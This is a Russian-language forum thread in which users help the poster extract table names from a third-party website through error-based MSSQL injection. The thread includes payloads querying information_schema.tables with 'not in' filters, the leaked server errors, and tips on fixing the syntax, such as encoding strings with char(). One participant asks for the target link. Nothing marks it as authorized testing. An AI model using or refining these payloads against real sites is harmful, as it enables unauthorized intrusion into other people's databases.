|
[Microsoft][ODBC SQL Server Driver]
Хай.
Короче есть проблема которую нужно решить ;) Существует сайт. На сайте инъекция (MSSQL) При запросе такого вида: =============================== -1+select+top+1+table_name+from+information_schema. tables =============================== В ошибке выводится имя таблицы: =============================== [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Products' to a column of data type int =============================== Одна таблица есть, пробую вытащить имя второй таблицы таким запросом: =============================== select+top+1+table_name+from+information_schema.ta bles+where+table_name+not+in('Products') =============================== На что сервак мне отвечает: =============================== [Microsoft][ODBC SQL Server Driver][SQL Server]Line 6: Incorrect syntax near 'Products' =============================== На многих серваках этот приём срабатывал..... Ошибка синтаксиса, хмм.. В чем же она заключается??? |
после in пробел есть?
|
угу
|
мб забыл -- поставить?
|
нет, комент там и не нужен все ок
Может есть какиенить альтернативы по перебору колонок? |
попробуй скобки убрать, т.е. просто table_name+not+in+'Products'
|
Спасибо попробую
|
Попробовал, вот что мне вылезло:
============================ Incorrect syntax near '' ============================ :( |
Решение - кинь ссылку, вторую теу уже создаешь )
|
хм интересено, если 'Products' перевести в вид "char(....)"
типа : ================================ select+top+1+table_name+from+information_schema.ta bles+where+table_name+not+in(char(....)) ================================ |
| Время: 15:32 |